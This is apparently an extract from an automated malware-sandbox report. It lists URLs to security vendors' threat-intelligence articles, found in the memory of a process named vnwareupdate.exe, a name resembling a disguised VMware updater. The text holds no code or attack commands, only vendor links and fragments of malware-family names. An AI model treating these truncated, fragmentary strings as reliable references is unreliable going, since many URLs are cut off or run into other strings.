Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/fake-flash-update-watering-hole-attack/Fake
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/fake-flash-update-watering-hole-attack/HoeflerText
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/htprat/
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/3ce763275c55e691;APT10
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/Remcos
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/bRemcos
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf.P
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf21aee5e49dfa7b39fc97f0
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf49458ab6253da1f3023266
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf7e17eea51551c8d9ece289
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf928822f67fbb3cd9c83be8
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfThe
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfc6e75bb6acd73bc7cf8908
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfh
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfhttp://goo.gl/NpJpVZ
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfoney
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdfssom
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/chinese-threat-group-targeted-turkish-organizat
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/chinese-threat-group-targeted-turkish-organizatChinese
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/chinese-threat-group-targeted-turkish-organizatDressCode
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/duqu
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/spam-campaign-distributes-adwind-rat
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/spam-campaign-distributes-adwind-ratDroidJack
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/blog/spam-campaign-distributes-adwind-ratSpam
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/bronze-unionBRONZE
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/bronze-unionContinued
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/htran8
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/htranAPTnotes
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaigns
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaigns//SamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaigns/fSamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaigns68dSamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaigns9SamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaignsSamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaignsc0Recent
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaignsleSamSam
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/samsam-ransomware-campaignsrbHkdoor
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/sindigoo
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/sindigoo8
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/sindigooRecent
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/sindigooThe
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/sindigooWin32/Spy.Obator
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/skeleton-key-malware-analysis
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/skeleton-key-malware-analysisA
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaign
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignDridex
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignFull
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignGreenbugs
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignParanoid
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignSpearphishing
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignThe
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignl
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignl13475D0FDBA8DC7A648B57B10E8296D5;Bots
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignlThe
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/the-mirage-campaignmlGrand
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/wiper-malware-analysis-attacking-korean-finRecent
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/wiper-malware-analysis-attacking-korean-finTrojan.APT.Seinup
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.secureworks.com/research/wiper-malware-analysis-attacking-korean-finWiper
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/Teaching
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/TelsaCrypt
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/iOperation
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.skycure.com/blog/exaspy-commodity-android-spyware-targeting-high-lev
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-rotten-
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-rotten-Gaza
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-rotten-New
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-rotten-The
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/CVE-2017-0199-li
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/CVE-2017-0199-liNew
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/plugx-goes-to-th
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer8
Source: vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminerCoinMiner
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/O
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/O/A
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/ORoki
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/OTheDuqu
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/T
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/TAndroid
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/TRSA
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/TTelsaCrypt
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/backdoorwinnti-attackers-have-skeleton-th
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-Dragonfly:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-OilRig
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-an
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-ixTargeted
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-m
Source: vnwareupdate.exe, 00000003.00000003.245614299.0000000003AA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-sout
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-sout4Sowbug:
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-sout5Turla
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-sout8Sowbug:
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-soutSowbug:
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-soutViSowbug:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/forums/bitco
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/forums/bitcoCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/forums/bitcoVnCVE-2017-10271
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/connect/forums/bitcoVnUntangling
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Darktrack
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Legspin
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Nymaim
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Platinum
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Regin
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/Zeus
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitep
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitep8
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepBronze
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepComment
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepDeep
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepInComment
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepOperation
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepRegin
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepSyrian
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepThe
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepUPS:
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepUnComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepWeComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepe_Comment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepesComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepg
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepiaComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepliComment
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whiteprOperation
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepraBlank
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepraComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepraPutter
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepucComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepucture
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepxeComment
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepybComment
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2016-0224
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-010516-1811-99
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-011214-3734-99
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-011214-3734-99Mestep
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-011607-5822-99
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-011607-5822-99Mestep
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-011607-5822-99Trulop
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-031519-0428-99
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99663a;APT10
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99Andromeda
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.symantec.com/security_response/writeup.jsp?docid=2017-052206-5950-99North
